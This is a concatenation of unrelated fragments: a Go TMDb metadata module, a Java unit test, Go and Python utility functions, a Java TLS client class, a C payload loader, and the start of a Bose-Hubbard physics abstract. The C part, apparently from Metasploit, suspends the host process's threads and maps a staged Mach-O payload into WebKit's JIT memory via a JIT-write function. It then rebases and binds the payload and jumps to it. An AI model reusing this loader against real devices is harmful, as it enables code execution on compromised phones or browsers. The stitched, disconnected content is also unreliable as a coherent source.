polochon "github.com/odwrtw/polochon/lib"
tmdb "github.com/ryanbradynd05/go-tmdb"
"github.com/sirupsen/logrus"
)
// Compile-time checks: the module must satisfy both the polochon Detailer and
// Searcher interfaces.
var (
	_ polochon.Detailer = (*TmDB)(nil)
	_ polochon.Searcher = (*TmDB)(nil)
)
// Register tmdb as a Detailer at package load time so polochon can discover it
func init() {
	polochon.RegisterModule(&TmDB{})
}
// Module constants
const (
	// moduleName is the name this module registers under
	moduleName = "tmdb"
)

// API constants
const (
	// TmDBimageBaseURL is the base URL for original-size tmdb images
	TmDBimageBaseURL = "https://image.tmdb.org/t/p/original"
)

// TmDB errors
var (
	ErrInvalidArgument    = errors.New("tmdb: invalid argument")
	ErrMissingArgument    = errors.New("tmdb: missing argument")
	ErrNoMovieFound       = errors.New("tmdb: movie not found")
	ErrNoMovieTitle       = errors.New("tmdb: can not search for a movie with no title")
	ErrNoMovieImDBID      = errors.New("tmdb: can not search for a movie with no imdb")
	ErrFailedToGetDetails = errors.New("tmdb: failed to get movie details")
)
// TmDB implements the Detailer interface using the themoviedb.org API
type TmDB struct {
	client     *tmdb.TMDb // tmdb API client, set by InitWithParams
	configured bool       // true once InitWithParams has succeeded
}
// Params represents the module params
type Params struct {
	// APIKey is the themoviedb.org API key; required
	APIKey string `yaml:"apikey"`
}
// Init implements the module interface: it decodes the yaml-encoded params
// and configures the module once.
func (t *TmDB) Init(p []byte) error {
	// Already configured, nothing to do
	if t.configured {
		return nil
	}

	var params Params
	if err := yaml.Unmarshal(p, &params); err != nil {
		return err
	}
	return t.InitWithParams(&params)
}
// InitWithParams configures the module
func (t *TmDB) InitWithParams(params *Params) error {
	// An API key is mandatory to talk to tmdb
	if params.APIKey == "" {
		return ErrMissingArgument
	}
	t.client = tmdb.Init(tmdb.Config{APIKey: params.APIKey})
	t.configured = true
	return nil
}
// Name implements the Module interface by returning the module name ("tmdb")
func (t *TmDB) Name() string {
	return moduleName
}
// Function to be overwritten during the tests — this indirection lets tests
// mock the tmdb title search without hitting the real API
var tmdbSearchMovie = func(t *tmdb.TMDb, title string, options map[string]string) (*tmdb.MovieSearchResults, error) {
	return t.SearchMovie(title, options)
}
// SearchByTitle searches a movie by its title. It adds the tmdb id into the
// movie struct so it can get details later
func (t *TmDB) searchByTitle(m *polochon.Movie, log *logrus.Entry) error {
	// No title, no search
	if m.Title == "" {
		return ErrNoMovieTitle
	}

	// ID already found
	if m.TmdbID != 0 {
		return nil
	}

	// Add year option if given, to narrow the search
	options := map[string]string{}
	if m.Year != 0 {
		options["year"] = fmt.Sprintf("%d", m.Year)
	}

	// Search on tmdb
	r, err := tmdbSearchMovie(t.client, m.Title, options)
	if err != nil {
		return err
	}

	// Check if there is any results
	if len(r.Results) == 0 {
		log.Debugf("Failed to find movie from imdb title %q", m.Title)
		return ErrNoMovieFound
	}

	// Find the most accurate movie based on the levenshtein distance between
	// the wanted title and each candidate title.
	// NOTE(review): candidates at distance >= 100 are never selected; if all
	// results are that far off, the zero-valued ID is stored — confirm intended.
	var movieShort tmdb.MovieShort
	minDistance := 100
	for _, result := range r.Results {
		d := levenshtein.ComputeDistance(m.Title, result.Title)
		if d < minDistance {
			minDistance = d
			movieShort = result
		}
	}

	m.TmdbID = movieShort.ID
	log.Debugf("Found movie from title %q", m.Title)
	return nil
}
// Function to be overwritten during the tests — this indirection lets tests
// mock the tmdb external-ID lookup without hitting the real API
var tmdbSearchByImdbID = func(t *tmdb.TMDb, id, source string, options map[string]string) (*tmdb.FindResults, error) {
	// Forward the caller-supplied external source instead of hard-coding
	// "imdb_id"; all current callers pass "imdb_id", so behavior is unchanged,
	// but the parameter is no longer silently ignored.
	return t.GetFind(id, source, options)
}
// searchByImdbID searches on tmdb based on the imdb id
func (t *TmDB) searchByImdbID(m *polochon.Movie, log *logrus.Entry) error {
	switch {
	case m.ImdbID == "":
		// No imdb id, no search
		return ErrNoMovieImDBID
	case m.TmdbID != 0:
		// ID already known, nothing to do
		return nil
	}

	// Ask tmdb to resolve the external imdb id
	found, err := tmdbSearchByImdbID(t.client, m.ImdbID, "imdb_id", map[string]string{})
	if err != nil {
		return err
	}

	if len(found.MovieResults) == 0 {
		log.Debugf("Failed to find movie from imdb ID %q", m.ImdbID)
		return ErrNoMovieFound
	}

	m.TmdbID = found.MovieResults[0].ID
	log.Debugf("Found movie from imdb ID %q", m.ImdbID)
	return nil
}
// Function to be overwritten during the tests — this indirection lets tests
// mock the tmdb movie-details lookup without hitting the real API
var tmdbGetMovieInfo = func(t *tmdb.TMDb, tmdbID int, options map[string]string) (*tmdb.Movie, error) {
	return t.GetMovieInfo(tmdbID, options)
}
// Status implements the Module interface by probing the API: it looks up a
// well-known movie (The Matrix, tt0133093) via its imdb ID.
func (t *TmDB) Status() (polochon.ModuleStatus, error) {
	found, err := tmdbSearchByImdbID(t.client, "tt0133093", "imdb_id", map[string]string{})
	if err != nil {
		return polochon.StatusFail, err
	}

	// An empty result set also means the API is not usable
	if len(found.MovieResults) == 0 {
		return polochon.StatusFail, ErrNoMovieFound
	}
	return polochon.StatusOK, nil
}
// GetDetails implements the Detailer interface. It resolves the movie's tmdb
// ID (from its imdb ID first, then from its title) and fills the movie with
// the details fetched from tmdb.
func (t *TmDB) GetDetails(i interface{}, log *logrus.Entry) error {
	m, ok := i.(*polochon.Movie)
	if !ok {
		return ErrInvalidArgument
	}

	// Search with imdb id; a not-found result is tolerated so the title
	// search below can still run.
	if m.ImdbID != "" && m.TmdbID == 0 {
		if err := t.searchByImdbID(m, log); err != nil && err != ErrNoMovieFound {
			return err
		}
	}

	// Search with title
	if m.Title != "" && m.TmdbID == 0 {
		if err := t.searchByTitle(m, log); err != nil && err != ErrNoMovieFound {
			return err
		}
	}

	// At this point if the tmdb id is still not found we can't update the
	// movie informations
	if m.TmdbID == 0 {
		return ErrFailedToGetDetails
	}

	// Fetch the full movie details and fill the polochon.Movie object
	return t.getMovieDetails(m)
}
// getMovieDetails will get the movie details and fill the polochon.Movie with
// the result
func (t *TmDB) getMovieDetails(movie *polochon.Movie) error {
	info, err := tmdbGetMovieInfo(t.client, movie.TmdbID, map[string]string{})
	if err != nil {
		return err
	}

	// Derive the release year from the release date, when present
	year := 0
	if info.ReleaseDate != "" {
		date, err := time.Parse("2006-01-02", info.ReleaseDate)
		if err != nil {
			return err
		}
		year = date.Year()
	}

	// Collect the genre names
	genres := []string{}
	for _, g := range info.Genres {
		genres = append(genres, g.Name)
	}

	// Copy the fetched details into the movie
	movie.ImdbID = info.ImdbID
	movie.OriginalTitle = info.OriginalTitle
	movie.Plot = info.Overview
	movie.Rating = info.VoteAverage
	movie.Runtime = int(info.Runtime)
	movie.SortTitle = info.Title
	movie.Tagline = info.Tagline
	movie.Thumb = TmDBimageBaseURL + info.PosterPath
	movie.Fanart = TmDBimageBaseURL + info.BackdropPath
	movie.Title = info.Title
	movie.Votes = int(info.VoteCount)
	movie.Year = year
	movie.Genres = genres

	return nil
}
|
/**
 * Test that the equals() method can distinguish all fields.
 * Each constructor argument is varied in turn: equality must break when only
 * one side carries the new value, and hold again once both sides match.
 */
public void testEquals() {
    Font font1 = new Font("SansSerif", Font.PLAIN, 12);
    Font font2 = new Font("SansSerif", Font.PLAIN, 14);

    // Baseline: identical arguments produce equal bands.
    MarkerAxisBand a1 = new MarkerAxisBand(null, 1.0, 1.0, 1.0, 1.0, font1);
    MarkerAxisBand a2 = new MarkerAxisBand(null, 1.0, 1.0, 1.0, 1.0, font1);
    assertEquals(a1, a2);

    // First double argument.
    a1 = new MarkerAxisBand(null, 2.0, 1.0, 1.0, 1.0, font1);
    assertFalse(a1.equals(a2));
    a2 = new MarkerAxisBand(null, 2.0, 1.0, 1.0, 1.0, font1);
    assertTrue(a1.equals(a2));

    // Second double argument.
    a1 = new MarkerAxisBand(null, 2.0, 3.0, 1.0, 1.0, font1);
    assertFalse(a1.equals(a2));
    a2 = new MarkerAxisBand(null, 2.0, 3.0, 1.0, 1.0, font1);
    assertTrue(a1.equals(a2));

    // Third double argument.
    a1 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 1.0, font1);
    assertFalse(a1.equals(a2));
    a2 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 1.0, font1);
    assertTrue(a1.equals(a2));

    // Fourth double argument.
    a1 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font1);
    assertFalse(a1.equals(a2));
    a2 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font1);
    assertTrue(a1.equals(a2));

    // Font argument.
    a1 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font2);
    assertFalse(a1.equals(a2));
    a2 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font2);
    assertTrue(a1.equals(a2));
}
// CheckEndpoints validates endpoint_1 and endpoint_2.
func (fr *FirewallRule) CheckEndpoints() error {
endpoints := []*FirewallRuleEndpointType{
fr.GetEndpoint1(),
fr.GetEndpoint2(),
}
for _, endpoint := range endpoints {
if err := endpoint.ValidateEndpointType(); err != nil {
return err
}
}
return nil
} |
// GetDeviceState returns the current state with name stateName for the device with URL deviceURL
func (k *Kiz) GetDeviceState(deviceURL DeviceURL, stateName StateName) (DeviceState, error) {
resp, err := k.clt.GetDeviceState(string(deviceURL), string(stateName))
if err != nil {
return DeviceState{}, err
}
defer resp.Body.Close()
var result DeviceState
json.NewDecoder(resp.Body).Decode(&result)
return result, nil
} |
def list_indiv_from_pop(
    dict_indiv_pop,
    dict_indiv_superpop
):
    """Group individuals by population and by super-population.

    Args:
        dict_indiv_pop: mapping of individual -> population label.
        dict_indiv_superpop: mapping of individual -> super-population label.

    Returns:
        Tuple of two dicts: (population -> list of individuals,
        super-population -> list of individuals). Within each list the
        individuals keep the iteration order of the input mapping.
    """
    # Single pass per mapping. The original scanned every individual once per
    # label (O(individuals * labels)) and shadowed its own loop list
    # (`list_pop` was both the iterated list and the per-label accumulator).
    return (
        _group_by_label(dict_indiv_pop),
        _group_by_label(dict_indiv_superpop),
    )


def _group_by_label(membership):
    """Invert an individual -> label mapping into label -> [individuals]."""
    groups = {}
    for indiv, label in membership.items():
        groups.setdefault(label, []).append(indiv)
    return groups
<filename>src/java/org/xlattice/crypto/tls/TlsClientEngine.java
/* TlsClientEngine.java */
package org.xlattice.crypto.tls;
import java.io.IOException;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
/**
 * TLS engine operating in client mode: this side initiates the TLS
 * handshake instead of waiting for a peer to do so. All other behavior is
 * inherited from {@link TlsEngine}.
 */
public class TlsClientEngine extends TlsEngine {

    /**
     * Creates a client-mode engine over the given context and session;
     * engine setup itself is delegated to the superclass constructor.
     *
     * @param ctx  TLS configuration context, passed through to TlsEngine
     * @param sess TLS session state, passed through to TlsEngine
     * @throws GeneralSecurityException if engine setup fails in the superclass
     * @throws IOException              on I/O failure during engine construction
     */
    protected TlsClientEngine (TlsContext ctx, TlsSession sess)
                                throws GeneralSecurityException, IOException {
        super (ctx, sess);
        // `engine` is inherited from TlsEngine; switch it to client mode so
        // this end starts the handshake.
        engine.setUseClientMode(true);
    }
}
|
#include <stdio.h>
#include <dlfcn.h>
#include <mach/mach.h>
#include <mach-o/fat.h>
#include <mach-o/loader.h>
#include <sys/mman.h>
#include <mach/vm_map.h>
#include "magic.h"
/*#define DEBUG 1*/
//asl_log isn't working, so: idevicesyslog | grep SandboxViolation
#ifdef DEBUG
#define debug_print(fmt, ...) \
do { \
char* buffer = malloc_func(1024); \
sprintf_func(buffer, fmt, __VA_ARGS__); \
fopen_func(buffer, "w"); \
free_func(buffer); \
} while (0)
//do { asl_log_func(0, 0, ASL_LEVEL_ERR, fmt, __VA_ARGS__); } while (0)
#else
#define debug_print(fmt, ...)
#endif
#define DLSYM_FUNC(func, library, return_type, args...) \
typedef return_type (*func##_ptr)(args); \
func##_ptr func##_func = dlsym_func(library, #func);
typedef void* (*t_dlsym)(void* handle, const char* symbol);
typedef void* (*t_dlopen)(const char* library, int rtld);
void load(void* buffer, t_dlsym _dlsym, void* jitwrite, void* jitstart, void* jitend);
// Payload entry point, called by the injector with pre-resolved addresses:
// dlopen/dlsym (so this blob needs no link-time imports), JavaScriptCore's
// JIT-write helper, and the [startOfFixMem, endOfFixMem) bounds of the fixed
// executable region. It suspends every other thread in the task (so nothing
// races the in-place code patching), then hands off to load() to map and run
// the Mach-O payload staged near the end of the region.
void init(void* dlopen_addr, void* dlsym_addr, void* jitwrite_addr, uint64_t startOfFixMem, uint64_t endOfFixMem)
{
    // Rebuild callable dlopen/dlsym from the raw addresses we were handed.
    typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
    dlsym_ptr dlsym_func = dlsym_addr;
    typedef void* (*dlopen_ptr)(const char *filename, int flags);
    dlopen_ptr dlopen_func = dlopen_addr;
    void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
    // Suspend threads
    typedef mach_port_t (*mach_task_self_ptr)();
    typedef thread_port_t (*mach_thread_self_ptr)();
    typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread);
    typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count);
    // mach_task_self/mach_thread_self are looked up through IOKit here, the
    // thread-control calls through libSystem.
    void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
    mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
    mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self");
    thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend");
    task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads");
    // Freeze every thread except our own so no other thread executes code
    // we are about to overwrite.
    thread_act_t current_thread = mach_thread_self_func();
    mach_msg_type_number_t thread_count;
    thread_act_array_t thread_list;
    kern_return_t result = task_threads_func(mach_task_self_func(), (thread_act_array_t)&thread_list, &thread_count);
    if (!result && thread_count) {
        for (unsigned int i = 0; i < thread_count; ++i) {
            thread_act_t other_thread = thread_list[i];
            if (other_thread != current_thread) {
                thread_suspend_func(other_thread);
            }
        }
    }
    // The embedded Mach-O payload sits 0xF0000 bytes before the end of the
    // fixed region. NOTE(review): this offset is an injector-side convention;
    // confirm it matches the stager that placed the payload.
    uint64_t payloadBuffer = endOfFixMem - (0x100000 - 0x10000);
#ifdef DEBUG
    DLSYM_FUNC(malloc, libsystem, void*, size_t)
    DLSYM_FUNC(free, libsystem, void*)
    DLSYM_FUNC(sprintf, libsystem, int, char* str, const char * format, ... );
    DLSYM_FUNC(fopen, libsystem, FILE*, const char * filename, const char * mode );
    debug_print("%s", "hello from metasploit");
    debug_print("%s", "hello from metasploit");
    debug_print("%s", "hello from metasploit");
    debug_print("%s", "hello from metasploit");
    debug_print("%s", "hello from metasploit");
    debug_print("main:%p", (void*)init);
    debug_print("end:%p", (void*)endOfFixMem);
    debug_print("buffer:%p", (void*)payloadBuffer);
    debug_print("nbuffer:%p", (void*)*(uint64_t*)payloadBuffer);
    debug_print("start:%p", (void*)startOfFixMem);
#endif
    load((void*)payloadBuffer, (t_dlsym)dlsym_func, jitwrite_addr, (void*)startOfFixMem, (void*)endOfFixMem);
}
/* Crash on purpose: write to an unmapped "poison" address that embeds `code`,
 * so the fault address in the crash report identifies which check failed. */
void fail(uint64_t code)
{
    volatile int* poison = (volatile int*)(0xbad000000000ull + code);
    *poison = 0xdead;
}
#define ASSERT(x) if (!(x))fail(0xa00000000ull + __LINE__)
#define MIN(x,y) ((x)<(y)?(x):(y))
#define MAX(x,y) ((x)>(y)?(x):(y))
// Copy `size` bytes from `src` into the otherwise non-writable JIT region at
// `dst`, by going through JavaScriptCore's jitWriteSeparateHeapsFunction
// (which takes an offset relative to the start of the fixed executable
// mapping). The copy is verified with memcmp; any failure crashes via
// ASSERT/fail so the fault shows up in the crash log.
void performJITMemcpy(t_dlsym _dlsym, void* jitwrite, void* startOfFixMem, void* dst, void* src, size_t size)
{
    typedef void (*JITWriteSeparateHeapsFunction)(off_t, const void*, size_t);
    JITWriteSeparateHeapsFunction jitWriteSeparateHeapsFunction = jitwrite;
    ASSERT(jitWriteSeparateHeapsFunction);
    ASSERT(startOfFixMem);
    int (*_memcmp)(const void *, const void*, size_t) = _dlsym(RTLD_DEFAULT, "memcmp");
    // The gadget addresses the JIT region by offset, not pointer.
    off_t offset = (off_t)((uintptr_t)dst - (uintptr_t)startOfFixMem);
    jitWriteSeparateHeapsFunction(offset, src, size);
    // Confirm the bytes actually landed.
    ASSERT(!_memcmp(dst, src, size));
}
// Decode one unsigned LEB128 value from *pp, advancing *pp past it.
// `end` bounds the opcode stream; running off the end or shifting past
// 64 bits crashes via ASSERT. Used to parse dyld rebase/bind operands.
static inline uintptr_t read_uleb128(uint8_t** pp, uint8_t* end)
{
    uint8_t* p = *pp;
    uint64_t result = 0;
    int bit = 0;
    do {
        ASSERT(p != end);
        uint64_t slice = *p & 0x7f;
        // Guard against overflowing the 64-bit accumulator, then merge this
        // 7-bit slice. (The original had a stray `else` with no matching
        // `if` here, which did not compile; this restores the standard dyld
        // uleb128 accumulate step.)
        ASSERT(bit <= 63);
        result |= (slice << bit);
        bit += 7;
    } while (*p++ & 0x80);
    *pp = p;
    return result;
}
// Decode one signed LEB128 value from *pp, advancing *pp past it.
// `end` bounds the stream; overrunning it crashes via ASSERT. Negative
// values are sign-extended from the last 7-bit group.
static inline uintptr_t read_sleb128(uint8_t** pp, uint8_t* end)
{
    uint8_t* cur = *pp;
    int64_t value = 0;
    int shift = 0;
    uint8_t b;
    do {
        ASSERT(cur != end);
        b = *cur++;
        value |= (((int64_t)(b & 0x7f)) << shift);
        shift += 7;
    } while (b & 0x80);
    // Bit 6 of the final byte is the sign bit: extend it over the
    // remaining high bits.
    if ((b & 0x40) != 0)
        value |= (-1LL) << shift;
    *pp = cur;
    return value;
}
// <3 qwerty
// Interpreter for the compressed LC_DYLD_INFO rebase opcode stream: walks
// the stream referenced by `dyld_info` and adds `reloc_slide` to every
// pointer slot it designates, relocating the image copy at `map` to its
// final load address.
//
//   map           - writable copy of the image, laid out by vmaddr
//   segstart      - vmaddr of each segment, indexed by opcode segment index
//   linkedit_base - __LINKEDIT vmaddr minus fileoff, so the file offsets in
//                   the load command resolve to addresses inside `map`
//   reloc_slide   - final base address the image will run at
void rebase(struct dyld_info_command* dyld_info,
            uint8_t* map,
            uintptr_t* segstart,
            uintptr_t linkedit_base,
            uintptr_t reloc_slide) {
    uint8_t* start = map + dyld_info->rebase_off + linkedit_base;
    uint8_t* end = start + dyld_info->rebase_size;
    uintptr_t address = (uintptr_t)map;
    uintptr_t count = 0, skip = 0;
    char done = 0;
    uint8_t* p = start;
    while (!done && (p < end)) {
        // Each opcode byte packs the operation (high nibble) and an
        // immediate operand (low nibble).
        uint8_t immediate = *p & REBASE_IMMEDIATE_MASK;
        uint8_t opcode = *p & REBASE_OPCODE_MASK;
        ++p;
        switch (opcode) {
        case REBASE_OPCODE_DONE:
            done = 1;
            break;
        case REBASE_OPCODE_SET_TYPE_IMM:
            // Only plain pointer rebases are supported here.
            ASSERT(immediate == REBASE_TYPE_POINTER);
            break;
        case REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB:
            // Position the cursor at segment[immediate] + uleb offset.
            address = (uintptr_t)(map + segstart[immediate] + read_uleb128(&p, end));
            break;
        case REBASE_OPCODE_ADD_ADDR_ULEB:
            address += read_uleb128(&p, end);
            break;
        case REBASE_OPCODE_ADD_ADDR_IMM_SCALED:
            address += immediate * sizeof(uintptr_t);
            break;
        case REBASE_OPCODE_DO_REBASE_IMM_TIMES:
            // Slide `immediate` consecutive pointers.
            for (int i=0; i < immediate; ++i) {
                *(uintptr_t*)(address) += reloc_slide;
                address += sizeof(uintptr_t);
            }
            break;
        case REBASE_OPCODE_DO_REBASE_ULEB_TIMES:
            // Slide `count` consecutive pointers, count given as uleb.
            count = read_uleb128(&p, end);
            for (int i = 0; i < count; ++i) {
                *(uintptr_t*)(address) += reloc_slide;
                address += sizeof(uintptr_t);
            }
            break;
        case REBASE_OPCODE_DO_REBASE_ADD_ADDR_ULEB:
            // Slide one pointer, then skip ahead by a uleb delta.
            *(uintptr_t*)(address) += reloc_slide;
            address += read_uleb128(&p, end) + sizeof(uintptr_t);
            break;
        case REBASE_OPCODE_DO_REBASE_ULEB_TIMES_SKIPPING_ULEB:
            // Slide `count` pointers spaced `skip` bytes apart.
            count = read_uleb128(&p, end);
            skip = read_uleb128(&p, end);
            for (int i = 0; i < count; ++i) {
                *(uintptr_t*)address += reloc_slide;
                address += skip + sizeof(uintptr_t);
            }
            break;
        default:
            // Unknown opcode: crash loudly rather than corrupt the image.
            ASSERT(0);
            break;
        }
    }
}
// Interpreter for the LC_DYLD_INFO bind opcode stream: resolves every
// external symbol the image imports and writes its address into the slots
// the opcodes designate. All lookups go through dlsym(RTLD_DEFAULT, ...) in
// the host process; dylib ordinals and addends are parsed only to keep the
// stream in sync and are otherwise ignored.
void bindit(struct dyld_info_command* dyld_info,
            uint8_t* map,
            uintptr_t* segstart,
            uintptr_t linkedit_base,
            t_dlsym _dlsym) {
    uint8_t* start = map + dyld_info->bind_off + linkedit_base;
    uint8_t* end = start + dyld_info->bind_size;
    uintptr_t address = (uintptr_t)map;
    uintptr_t count = 0, skip = 0;
    char done = 0;
    unsigned char type = 0;
    uint8_t* p = start;
    char* symbolName=0;
    while (!done && (p < end)) {
        // Operation in the high nibble, immediate operand in the low nibble.
        uint8_t immediate = *p & BIND_IMMEDIATE_MASK;
        uint8_t opcode = *p & BIND_OPCODE_MASK;
        ++p;
        switch (opcode) {
        case BIND_OPCODE_DONE:
            done = 1;
            break;
        case BIND_OPCODE_SET_DYLIB_ORDINAL_IMM:
            // Dylib ordinal ignored — everything resolves via RTLD_DEFAULT.
            break;
        case BIND_OPCODE_SET_DYLIB_ORDINAL_ULEB:
            // Consume (and discard) the uleb-encoded ordinal.
            read_uleb128(&p, end);
            break;
        case BIND_OPCODE_SET_DYLIB_SPECIAL_IMM:
            break;
        case BIND_OPCODE_SET_SYMBOL_TRAILING_FLAGS_IMM:
            // Remember the NUL-terminated symbol name embedded in the stream
            // and advance past it.
            symbolName = (char*)p;
            while (*p != '\0')
                ++p;
            ++p;
            break;
        case BIND_OPCODE_SET_TYPE_IMM:
            break;
        case BIND_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB:
            // Position the cursor at segment[immediate] + uleb offset.
            address = (uintptr_t)(map + segstart[immediate] + read_uleb128(&p, end));
            break;
        case BIND_OPCODE_SET_ADDEND_SLEB:
            // Addend parsed but not applied.
            read_sleb128(&p, end);
            break;
        case BIND_OPCODE_ADD_ADDR_ULEB:
            address += read_uleb128(&p, end);
            break;
        case BIND_OPCODE_DO_BIND:
            // symbolName+1 strips the leading underscore Mach-O prepends to
            // C symbol names before the dlsym lookup.
            *(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
            address += sizeof(uintptr_t);
            break;
        case BIND_OPCODE_DO_BIND_ADD_ADDR_ULEB:
            *(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
            address += read_uleb128(&p, end) + sizeof(uintptr_t);
            break;
        case BIND_OPCODE_DO_BIND_ADD_ADDR_IMM_SCALED:
            *(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
            address += (immediate + 1) * sizeof(uintptr_t);
            break;
        case BIND_OPCODE_DO_BIND_ULEB_TIMES_SKIPPING_ULEB:
            // Bind `count` slots spaced `skip` bytes apart to the same symbol.
            count = read_uleb128(&p, end);
            skip = read_uleb128(&p, end);
            for (uint32_t i = 0; i < count; ++i) {
                *(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
                address += skip + sizeof(uintptr_t);
            }
            break;
        default:
            // Unknown opcode: crash loudly rather than mis-bind.
            ASSERT(0);
        }
    }
}
// Map and start the Mach-O payload staged at `buffer`.
//
// Steps: scan backwards from `buffer` for the 64-bit Mach-O magic
// (0xfeedfacf); measure the executable/writable segment extents; copy all
// segments into a scratch anonymous mapping laid out by vmaddr; apply the
// dyld rebase/bind info against the final address; install the result (the
// executable part through performJITMemcpy into the fixed JIT region, the
// writable part into a fresh RW mapping at `jitend`); then jump to the
// address stored after the MAGIC marker inside the payload.
void load(void* buffer, t_dlsym _dlsym, void* jitwrite, void* jitstart, void* jitend)
{
// Loop helpers: FOR_COMMAND iterates the load commands; FOR_SEGMENT_64
// additionally filters for LC_SEGMENT_64 and skips __PAGEZERO. Both open a
// block that the call site must close with `}`.
# define FOR_COMMAND \
lc = (void*)(header + 1); \
for (int i = 0; i < header->ncmds; ++i, lc = (void*)((char*)lc + lc->cmdsize)) { \
# define FOR_SEGMENT_64 \
FOR_COMMAND \
if (lc->cmd != LC_SEGMENT_64) \
continue; \
struct segment_command_64* sc = (void*)lc; \
if (!_strcmp(sc->segname, "__PAGEZERO")) \
continue;
    // libc entry points resolved at run time, so the payload needs no
    // link-time imports of its own.
    void* (*_mmap)(void *addr, size_t len, int prot, int flags, int fd, off_t offset);
    void* (*_memcpy)(void *restrict dst, const void *restrict src, size_t n);
    int (*_strcmp)(const char *s1, const char *s2);
    _mmap = _dlsym(RTLD_DEFAULT, "mmap");
    _memcpy = _dlsym(RTLD_DEFAULT, "memcpy");
    _strcmp = _dlsym(RTLD_DEFAULT, "strcmp");
    uintptr_t exec_base = -1, exec_end = 0,
        write_base = -1, write_end = 0,
        base = -1, end = 0;
    // The Mach-O header precedes `buffer` in memory: walk backwards until
    // the 64-bit magic is found.
    uint32_t* x = (uint32_t*)buffer;
    while (*x != 0xfeedfacf)
        x--;
    struct mach_header_64* header = (struct mach_header_64*)x;
    struct load_command* lc;
    uintptr_t linkedit_base = 0;
    uintptr_t segstart[32];
    int segcnt = 0;
    // Pass 1: record each segment's vmaddr (for the opcode interpreters)
    // and compute the executable / writable / overall vm extents.
    FOR_SEGMENT_64
        uintptr_t from = sc->vmaddr, to = from + sc->vmsize;
        segstart[segcnt++] = from;
        if (!_strcmp(sc->segname, "__LINKEDIT"))
            linkedit_base = sc->vmaddr - sc->fileoff;
        if (sc->initprot & VM_PROT_EXECUTE) {
            exec_base = MIN(exec_base, from);
            exec_end = MAX(exec_end, to);
        }
        if (sc->initprot & VM_PROT_WRITE) {
            write_base = MIN(write_base, from);
            write_end = MAX(write_end, to);
        }
        base = MIN(base, from);
        end = MAX(end, to);
    }
    // Scratch copy of the whole image, laid out by vmaddr, which we can
    // freely rebase/bind before installing it.
    uint8_t* tmpmap = _mmap(0, end - base, PROT_WRITE | PROT_READ,
        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    ASSERT(tmpmap);
    FOR_SEGMENT_64
        _memcpy(tmpmap + sc->vmaddr, (char*)header + sc->fileoff, sc->filesize);
    }
    // Layout assumption: every writable segment comes after the executable
    // ones, so the image can be split in two at write_base.
    ASSERT(write_base >= exec_end);
    // The RW half lives directly after the JIT region.
    void* rw = _mmap(jitend, end - write_base, PROT_READ|PROT_WRITE,
        MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    ASSERT(rw == jitend);
    // Final base address the payload runs at, chosen so its writable part
    // lands exactly on `rw`.
    uint8_t* finalmap = jitend - write_base + base;
    uintptr_t reloc_slide = (uintptr_t)finalmap;
    FOR_COMMAND
        if (lc->cmd == LC_DYLD_INFO_ONLY || lc->cmd == LC_DYLD_INFO) {
            rebase((void*)lc, tmpmap, segstart, linkedit_base, reloc_slide);
            bindit((void*)lc, tmpmap, segstart, linkedit_base, _dlsym);
        }
    }
    // Install the executable half: through the JIT-write gadget when
    // available, otherwise with a plain memcpy.
    if (jitwrite && jitstart) {
        performJITMemcpy(_dlsym, jitwrite, jitstart, finalmap, tmpmap, write_base - base);
    } else {
        // NOTE(review): the `- 1` makes this copy one byte less than the
        // JIT path above — confirm it is intentional.
        _memcpy(finalmap, tmpmap, (write_base - base) - 1);
    }
    _memcpy(rw, tmpmap + write_base - base, end - write_base);
    // Locate the entry point: the payload stores a MAGIC marker followed by
    // the (already slid) entry address somewhere in its segments.
    void (*entrypoint)();
    FOR_SEGMENT_64
        uint64_t* x = (void*)(finalmap + sc->vmaddr);
        while ((char*)x != (char*)(finalmap + sc->vmaddr + sc->vmsize)) {
            if (*x == MAGIC) {
                entrypoint = (void*)*(x+1);
                goto found_entrypoint;
            }
            x++;
        }
    }
    // NOTE(review): if no MAGIC marker exists, `entrypoint` is used
    // uninitialized below.
found_entrypoint:
    entrypoint();
}
// Unused placeholder entry point: the real work starts at init(), which the
// injector calls directly. main exists only so this payload links as a
// complete executable.
int main()
{
    return 0;
}
|
Solution of one-dimensional Bose Hubbard model in large-$U$ limit
The one-dimensional Bose-Hubbard model in large-$U$ limit has been studied via reducing and mapping the Hamiltonian to a simpler one. The eigenstates and eigenvalues have been obtained exactly in the subspaces with fixed numbers of single- and double-occupancies but without multiple-occupancies, and the thermodynamic properties of the system have been calculated further. These eigenstates and eigenvalues also enable us to develop a new perturbation treatment of the model, with which the ground-state energy has been calculated exactly to first order in $1/U$.
I. INTRODUCTION
The Bose-Hubbard model perhaps is the simplest one to describe the physics of strongly-correlated Bose systems in a lattice, in which bosons hop between neighboring lattice sites and interact via an on-site repulsion U . In general, such model cannot be exactly solved even in the one-dimensional (1D) case .
